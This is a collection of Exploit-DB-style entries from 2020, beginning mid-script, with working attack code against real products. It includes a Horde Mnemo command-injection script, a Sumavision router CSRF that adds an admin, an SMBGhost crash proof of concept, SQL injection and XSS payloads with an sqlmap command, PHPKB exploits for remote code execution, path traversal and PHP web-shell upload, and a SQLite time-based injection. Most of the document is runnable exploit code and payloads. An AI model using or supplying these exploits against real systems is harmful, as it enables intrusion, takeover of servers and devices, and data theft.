logging.addLevelName(logging.INFO, "\033[96mINFO\033[0m") logging.addLevelName(logging.WARNING, "\033[93mWARN\033[0m") logging.addLevelName(logging.ERROR, "\033[95mERRR\033[0m") logging.addLevelName(logging.CRITICAL, "\033[91mCRIT\033[0m") else: logging.addLevelName(logging.NOTSET, "????") logging.addLevelName(logging.DEBUG, "DBUG") logging.addLevelName(logging.INFO, "INFO") logging.addLevelName(logging.WARNING, "WARN") logging.addLevelName(logging.ERROR, "ERRR") logging.addLevelName(logging.CRITICAL, "CRIT") if args.verbose: logging.basicConfig(format=LOG_FORMAT, level=logging.DEBUG) else: logging.basicConfig(format=LOG_FORMAT, level=logging.INFO) if args.payload == 'stdin': logging.info("Reading payload from STDIN.") payload_xml = sys.stdin.read() logging.debug(payload_xml) else: payload_xml = PAYLOADS[args.payload] logging.info("Connecting...") # Connect to the stat port. This is required for the cmd port to work. # The stat port also gives us the serial number. sock_stat = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock_stat.settimeout(args.timeout) sock_stat.connect((args.host, args.portstat)) # Connect to the cmd port. sock_cmd = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock_cmd.settimeout(args.timeout) sock_cmd.connect((args.host, args.portcmd)) # Pull the serial number from the stat port. logging.info("Pulling serial number...") stat_msg = sock_stat.recv(BUFFER_SIZE) if args.serial: serial = args.serial else: m = re.search('<mSerial>([^<]+)</mSerial>', stat_msg.decode('utf-8')) if not m: logging.critical("Could not determine target's serial number!") logging.debug(stat_msg) sys.exit(100) serial = m.group(1) logging.info("Identified serial: " + serial) # Perform a handshake with the cmd port. Requires the serial num. logging.info('Performing handshake...') send_handshake(sock_cmd, serial) recv_message(sock_cmd) # Blank response - trash. # Send the payload. logging.info("Sending payload...") send_message(sock_cmd, serial, payload_xml) logging.info("Waiting for response...") resp = recv_message(sock_cmd) logging.info("Response:\n" + resp) # Cleanup. sock_cmd.close() sock_stat.close() logging.info("Donezo.")

#!/bin/sh if [ "$#" -ne 4 ]; then echo '[!] Usage: <url> <username> <password> <command>' 1>&2 exit 1 fi BASE="$1" USERNAME="$2" PASSWORD="$3" COMMAND="$4" JAR="$(mktemp)" trap 'rm -f "$JAR"' EXIT echo "[+] Logging in as $USERNAME:$PASSWORD" 1>&2 curl -si -c "$JAR" "$BASE/login.php" \ -d 'login_post=1' \ -d "horde_user=$USERNAME" \ -d "horde_pass=$PASSWORD" | grep -q 'Location: /services/portal/' || \ echo '[!] Cannot log in' 1>&2 echo "[+] Uploading dummy file" 1>&2 echo x | curl -si -b "$JAR" "$BASE/mnemo/data.php" \ -F 'actionID=11' \ -F 'import_step=1' \ -F 'import_format=csv' \ -F 'notepad_target=x' \ -F 'import_file=@-;filename=x' \ -so /dev/null echo "[+] Running command" 1>&2 BASE64_COMMAND="$(echo -n "$COMMAND 2>&1" | base64 -w0)" curl -b "$JAR" "$BASE/mnemo/data.php" \ -d 'actionID=3' \ -d 'import_step=2' \ -d 'import_format=csv' \ -d 'header=1' \ -d 'fields=1' \ -d 'sep=x' \ --data-urlencode "quote=).passthru(base64_decode(\"$BASE64_COMMAND\")).die();}//\\"

# Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin) # Date: 2020-03-05 # Exploit Author: Miguel Mendez Z. # Vendor Homepage: www.sumavision.com # Software Link: http://www.sumavision.com/ensite/i.php?id=29 # Version: EMR 3.0.4.27 # CVE : CVE-2020-10181 -----------------------Exploit Bash--------------------------- echo "" read -p "Set Hostname: " host read -p "Set username: " user echo "(The password should be between 6 and 32 in length)" read -p "Set password: " pass echo echo "[+] creating user..." sleep 2 postdata=$(curl -X POST -d "type=11&cmd=3&language=0&slotNo=255&setString=$user<*1*>administrator<*1*>$pass" "http://$host/goform/formEMR30" -s | grep -i "0") if echo "$postdata" | grep -q "0</html>"; then echo "[+] http://$host/frame_en.asp" echo "[+] created access($user - $pass)" else echo "[-] user not created" fi ------------------------------------------------------ Reference: https://github.com/s1kr10s/Sumavision_EMR3.0/blob/master/exploit_sumavision.sh

# CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48216.zip ## Usage `./CVE-2020-0796.py servername` This script connects to the target host, and compresses the authentication request with a bad offset field set in the transformation header, causing the decompressor to buffer overflow and crash the target. This contains a modification of the excellent [smbprotocol](https://github.com/jborean93/smbprotocol) with added support for SMB 3.1.1 compression/decompression (only LZNT1). Most of the additions are in `smbprotocol/connection.py`. A version of [lznt1](https://github.com/you0708/lznt1) is included, modified to support Python 3. The compression transform header is in the `SMB2CompressionTransformHeader` class there. The function `_compress` is called to compress tree requests. This is where the offset field is set all high to trigger the crash. ```python def _compress(self, b_data, session): header = SMB2CompressionTransformHeader() header['original_size'] = len(b_data) header['offset'] = 4294967295 header['data'] = smbprotocol.lznt1.compress(b_data) ``` ## About CVE-2020-0796 is a bug in Windows 10 1903/1909's new SMB3 compression capability. SMB protocol version 3.1.1 introduces the ability for a client or server to advertise compression cabilities, and to selectively compress SMB3 messages as beneficial. To accomplish this, when negotiating an SMB session, the client and server must both include a `SMB2_COMPRESSION_CAPABILITIES` as documented in [MS-SMB2 2.2.3.1.3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271). Once a session is negotiated with this capability, either the client or the server can selectively compress certain SMB messages. To do so, the entire SMB packet is compressed, and a transformed header is prepended, as documented in [MS-SMB2 2.2.42](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1d435f21-9a21-4f4c-828e-624a176cf2a0). This header is a small (16 bytes) structure with a magic value, the uncompressed data size, the compression algorithm used, and an offset value. CVE-2020-0796 is caused by a lack of bounds checking in that offset size, which is directly passed to several subroutines. Passing a large value in will cause a buffer overflow, and crash the kernel. With further work, this could be developed into a RCE exploit.

# Exploit Title: MiladWorkShop VIP System 1.0 - 'lang' SQL Injection # Google Dork: Powered By MiladWorkShop VIP System # Date: 2020-03-03 # Exploit Author: AYADI Mohamed # email : [email protected] # Vendor Homepage: https://miladworkshop.ir/ # Software Link: https://miladworkshop.ir/vip.html # Version: 1.x # Tested on: Kali Linux (sqlmap) # CVE : N/A [ SQL injection exploitation ] Address : http://vip.target/forget Request Type : Post Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: lang=en AND 3-4400' OR 6146=6146-- ivGZ21=6 AND 000wM2X=000wM2X Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: lang=en AND 3' AND (SELECT 2915 FROM (SELECT(SLEEP(50)))StCO)-- vkVG21=6 AND 000wM2X=000wM2X example : sqlmap -u "http://vip.target/forget" --data lang=en'%20AND%203*2*1%3d6%20AND%20'000wM2X'%3d'000wM2X --random-agent --banner --ignore-prox --hex --level 3 --risk 3 --time-sec=6 --timeout 100 --tamper="between.py" [ XSS exploitation ] http://vip.target/%22%3E%3Cimg%20src=%22aa%22%20onerror=%22alert(1)%22%3E%3C #creetz to all Morrocans cyber security

# Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution # Google Dork: N/A # Date: 2020-03-15 # Exploit Author: Antonio Cannito # Vendor Homepage: https://www.knowledgebase-script.com/ # Software Link: https://www.knowledgebase-script.com/pricing.php # Version: Multi-Language v9 # Tested on: Windows 8.1 / PHP 7.4.3 # CVE : CVE-2020-10389 #!/usr/bin/env python3 import argparse import requests #Parsing arguments parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10389 - Authenticated Remote Code Execution in Chadha PHPKB Standard Multi-Language 9 in admin/save-settings.php") parser.add_argument("url", type=str, help="PHPKB's base path") parser.add_argument("username", type=str, help="Superuser username") parser.add_argument("password", type=str, help="Superuser password") parser.add_argument("cmd", type=str, help="The command you want executed") args = parser.parse_args() session = requests.Session() #Perform login session.post(args.url + "/admin/login.php", data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'}).text #Sending exploit code and downloading the file exp = """' . system("{}") . '""".format(args.cmd) data = {"putdown_for_maintenance": "no{}".format(exp), "kbname": "test", "kburl": "http://localhost/phpkb", "kb_access": "unrestricted", "extended_support_license_key": '', "mail_server": "default", "smtp_hostname": '', "smtp_username": '', "smtp_password": '', "smtp_port": '', "encryption_method": "None", "emails_debug_mode": "0", "emails_debug_output": "error_log", "send_mails_from": '', "test_email": '', "mysqlserver": "127.0.0.1", "mysqlusername": "root", "mysqlpswd": "DummyPass", "mysqldatabase": "test", "kb_layout": "fluid", "category_tree_width": "3", "sidebar_orientation": "left", "category_tree_layout": "normal", "show_tree_articles": "yes", "category_articles_count": "show", "categories_display_order": "Alphabetic", "home_theme": "modern", "home_search_layout": "default", "categories_layout_theme": "carousel", "show_categories_cols": "3", "category_title_size": "normal", "home_articles_layout": "tabbed", "display_featured": "yes", "featured_count": "5", "display_popular": "yes", "popular_count": "5", "display_rated": "yes", "rated_count": "5", "display_recent": "yes", "recent_count": "5", "enable_subscribe_kb": "yes", "kb_subscribe_theme": "minimal", "category_articles_layout": "default", "category_page_records_default": "10", "category_page_records_minimal": "10", "articles_sortby": "Popularity", "articles_sortorder": "Descending", "enable_subscribe_category": "yes", "enable_news_page": "yes", "display_homepage_news": "yes", "number_homepage_news": "5", "enable_login_page": "yes", "enable_glossary_page": "yes", "enable_contact_page": "yes", "send_contact_email": "yes", "contact_email_address": "[email protected]", "enable_instant_suggestions": "yes", "minimum_question_characters": "60", "default_search": "Articles", "search_in_articles": "All", "search_in_others": "Both", "search_filter": "Any Word", "display_recentviewed": "yes", "recentviewed_count": "5", "display_popular_searches": "yes", "popularsearch_count": "5", "article_page_theme": "default", "article_sidebar_content": "related", "enable_add_favorite": "yes", "enable_print_article": "yes", "enable_email_article": "yes", "enable_exportto_msword": "yes", "enable_exportto_pdf": "yes", "enable_subscribe_article": "yes", "enable_custom_fields": "yes", "enable_article_rating": "yes", "enable_article_hits": "yes", "enable_article_author": "yes", "show_author_email": "yes", "enable_related_articles": "yes", "number_related_articles": "10", "show_related_articles_randomly": "yes", "enable_article_feedback": "yes", "enable_article_comments": "yes", "existing_comments_visibility": "hide", "show_comments_to": "all", "comments_sortorder": "Descending", "email_privacy_protection": "yes", "article_meta_source": "article title", "notify_pending_comment_superuser": "yes", "notify_approved_comment_user": "yes", "schema_publisher_name": '', "schema_publisher_logo": '', "enable_rss_feed": "yes", "enable_rss_featured_feed": "yes", "enable_rss_popular_feed": "yes", "enable_rss_latest_feed": "yes", "enable_rss_rated_feed": "yes", "enable_rss_related_feed": "yes", "number_login_attempts": "9223372036854775807", "login_delay": "5", "maxfilesize": "10240", "kb_allowed_upload_file_types": "gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt", "searching_method": "0", "fulltext_mode": "0", "searchresultsperpage": "10", "enable_search_files": "yes", "doc_path": "C:\\antiword\\antiword.exe", "ppt_path": "C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe", "xls_path": "C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe", "pdf_path": "C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe", "index_attachment": "yes", "enable_autosave": "yes", "autosave_interval": "120000", "use_wysiwyg_editor": "yes", "enable_version_history": "yes", "enable_captcha": "yes", "captcha_type": "default", "recaptcha_site_key": '', "recaptcha_secret_key": '', "syntax_highlighter_theme": "shThemeDefault", "pdf_library": "wkhtmltopdf", "wkhtmltopdf_path": "lol", "pdf_header": '', "pdf_footer_type": "default", "pdf_page_numbers": "yes", "pdf_page_number_position": "Left", "pdf_footer": '', "kb_meta_keywords": "keyword1, keyword2, keyword3", "kb_meta_desc": "This is demo meta description. You can enter here your meta description.", "admin_results_perpage": "10", "_selected_tab_": '', "submit_hd": "Save", "submit_float_btn": ''} url = args.url + "/admin/manage-settings.php" session.post(url, data=data) print(session.get(args.url + "admin/include/configuration.php").text.encode('utf-8')) #Resetting settings data = {"putdown_for_maintenance": "no{}", "kbname": "test", "kburl": "http://localhost/phpkb", "kb_access": "unrestricted", "extended_support_license_key": '', "mail_server": "default", "smtp_hostname": '', "smtp_username": '', "smtp_password": '', "smtp_port": '', "encryption_method": "None", "emails_debug_mode": "0", "emails_debug_output": "error_log", "send_mails_from": '', "test_email": '', "mysqlserver": "127.0.0.1", "mysqlusername": "root", "mysqlpswd": "DummyPass", "mysqldatabase": "test", "kb_layout": "fluid", "category_tree_width": "3", "sidebar_orientation": "left", "category_tree_layout": "normal", "show_tree_articles": "yes", "category_articles_count": "show", "categories_display_order": "Alphabetic", "home_theme": "modern", "home_search_layout": "default", "categories_layout_theme": "carousel", "show_categories_cols": "3", "category_title_size": "normal", "home_articles_layout": "tabbed", "display_featured": "yes", "featured_count": "5", "display_popular": "yes", "popular_count": "5", "display_rated": "yes", "rated_count": "5", "display_recent": "yes", "recent_count": "5", "enable_subscribe_kb": "yes", "kb_subscribe_theme": "minimal", "category_articles_layout": "default", "category_page_records_default": "10", "category_page_records_minimal": "10", "articles_sortby": "Popularity", "articles_sortorder": "Descending", "enable_subscribe_category": "yes", "enable_news_page": "yes", "display_homepage_news": "yes", "number_homepage_news": "5", "enable_login_page": "yes", "enable_glossary_page": "yes", "enable_contact_page": "yes", "send_contact_email": "yes", "contact_email_address": "[email protected]", "enable_instant_suggestions": "yes", "minimum_question_characters": "60", "default_search": "Articles", "search_in_articles": "All", "search_in_others": "Both", "search_filter": "Any Word", "display_recentviewed": "yes", "recentviewed_count": "5", "display_popular_searches": "yes", "popularsearch_count": "5", "article_page_theme": "default", "article_sidebar_content": "related", "enable_add_favorite": "yes", "enable_print_article": "yes", "enable_email_article": "yes", "enable_exportto_msword": "yes", "enable_exportto_pdf": "yes", "enable_subscribe_article": "yes", "enable_custom_fields": "yes", "enable_article_rating": "yes", "enable_article_hits": "yes", "enable_article_author": "yes", "show_author_email": "yes", "enable_related_articles": "yes", "number_related_articles": "10", "show_related_articles_randomly": "yes", "enable_article_feedback": "yes", "enable_article_comments": "yes", "existing_comments_visibility": "hide", "show_comments_to": "all", "comments_sortorder": "Descending", "email_privacy_protection": "yes", "article_meta_source": "article title", "notify_pending_comment_superuser": "yes", "notify_approved_comment_user": "yes", "schema_publisher_name": '', "schema_publisher_logo": '', "enable_rss_feed": "yes", "enable_rss_featured_feed": "yes", "enable_rss_popular_feed": "yes", "enable_rss_latest_feed": "yes", "enable_rss_rated_feed": "yes", "enable_rss_related_feed": "yes", "number_login_attempts": "9223372036854775807", "login_delay": "5", "maxfilesize": "10240", "kb_allowed_upload_file_types": "gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt", "searching_method": "0", "fulltext_mode": "0", "searchresultsperpage": "10", "enable_search_files": "yes", "doc_path": "C:\\antiword\\antiword.exe", "ppt_path": "C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe", "xls_path": "C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe", "pdf_path": "C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe", "index_attachment": "yes", "enable_autosave": "yes", "autosave_interval": "120000", "use_wysiwyg_editor": "yes", "enable_version_history": "yes", "enable_captcha": "yes", "captcha_type": "default", "recaptcha_site_key": '', "recaptcha_secret_key": '', "syntax_highlighter_theme": "shThemeDefault", "pdf_library": "wkhtmltopdf", "wkhtmltopdf_path": "lol", "pdf_header": '', "pdf_footer_type": "default", "pdf_page_numbers": "yes", "pdf_page_number_position": "Left", "pdf_footer": '', "kb_meta_keywords": "keyword1, keyword2, keyword3", "kb_meta_desc": "This is demo meta description. You can enter here your meta description.", "admin_results_perpage": "10", "_selected_tab_": '', "submit_hd": "Save", "submit_float_btn": ''} session.post(url, data=data)

# Exploit Title: PHPKB Multi-Language 9 - Authenticated Directory Traversal # Google Dork: N/A # Date: 2020-03-15 # Exploit Author: Antonio Cannito # Vendor Homepage: https://www.knowledgebase-script.com/ # Software Link: https://www.knowledgebase-script.com/pricing.php # Version: Multi-Language v9 # Tested on: Windows 8.1 / PHP 7.4.3 # CVE : CVE-2020-10387 ########################## #!/usr/bin/env python3 import argparse import requests import shutil #Parsing arguments parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10387 - Authenticated Arbitrary File Download in admin/download.php in Chadha PHPKB Standard Multi-Language 9") parser.add_argument("url", type=str, help="PHPKB's base path") parser.add_argument("username", type=str, help="Superuser username") parser.add_argument("password", type=str, help="Superuser password") parser.add_argument("file", type=str, help="The file you want to download (starting from PHPKB's base path)") args = parser.parse_args() session = requests.Session() #Perform login session.post(args.url + "/admin/login.php", data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'}).text #Sending exploit code and downloading the file url = args.url + "/admin/download.php?called=ajax&act=backup-lang&file=../../" + args.file ext = url.split("/")[-1] with open(ext, 'wb') as file: shutil.copyfileobj(session.get(url, stream=True).raw, file) del session

# Exploit Title: PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution # Google Dork: N/A # Date: 2020-03-15 # Exploit Author: Antonio Cannito # Vendor Homepage: https://www.knowledgebase-script.com/ # Software Link: https://www.knowledgebase-script.com/pricing.php # Version: Multi-Language v9 # Tested on: Windows 8.1 / PHP 7.4.3 # CVE : CVE-2020-10386 #!/usr/bin/env python3 import argparse import requests from json import loads #Parsing arguments parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10386 - Remote Code Execution via .php file upload in admin/imagepaster/image-upload.php in Chadha PHPKB Standard Multi-Language 9") parser.add_argument("url", type=str, help="PHPKB's base path") parser.add_argument("username", type=str, help="Superuser/Writer/Translator/Editor username") parser.add_argument("password", type=str, help="Superuser/Writer/Translator/Editor password") parser.add_argument("command", type=str, help="The command you want to execute") args = parser.parse_args() session = requests.Session() #Perform login session.post(args.url + "/admin/login.php", data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'}).text #Sending exploit code baseurl = loads(session.post(args.url + "/admin/imagepaster/image-upload.php", files={'file': "<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>"}, data={'action': 'imageinsert_upload', 'imgMime': 'image/php', 'imgName': '../js/index.png', 'imgParent': 'null'}).text)["url"] print("Visit this page to execute the command:\n" + baseurl + "?cmd=" + args.command) print("\nIf you want to execute other commands you can re-execute the exploit or visit this webpage, followed by the command you want executed:\n" + baseurl + "?cmd=")

# Exploit Title: UADMIN Botnet 1.0 - 'link' SQL Injection # Google Dork: n/a # Date: 2020-03-16 # Exploit Author: n4pst3r # Vendor Homepage: unkn0wn # Software Link: unkn0wn # Version: unkn0wn # Tested on: Windows 10, Kali # CVE : n/a ################################ # Vuln-Code: download.php $link=$_GET['link']; $agent=esc__($_SERVER['HTTP_USER_AGENT']); if(isset($_GET['botid'])){ $botid=esc__($_GET['botid']); }else{ $botid='unknown'; }; ################################ Attack Response & PoC: --- Parameter: link (GET) Type: time-based blind Title: SQLite > 2.0 OR time-based blind (heavy query) Payload: link=1' OR 7990=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- nwGY --- http://127.0.0.1/ush/gates/token.php?link=1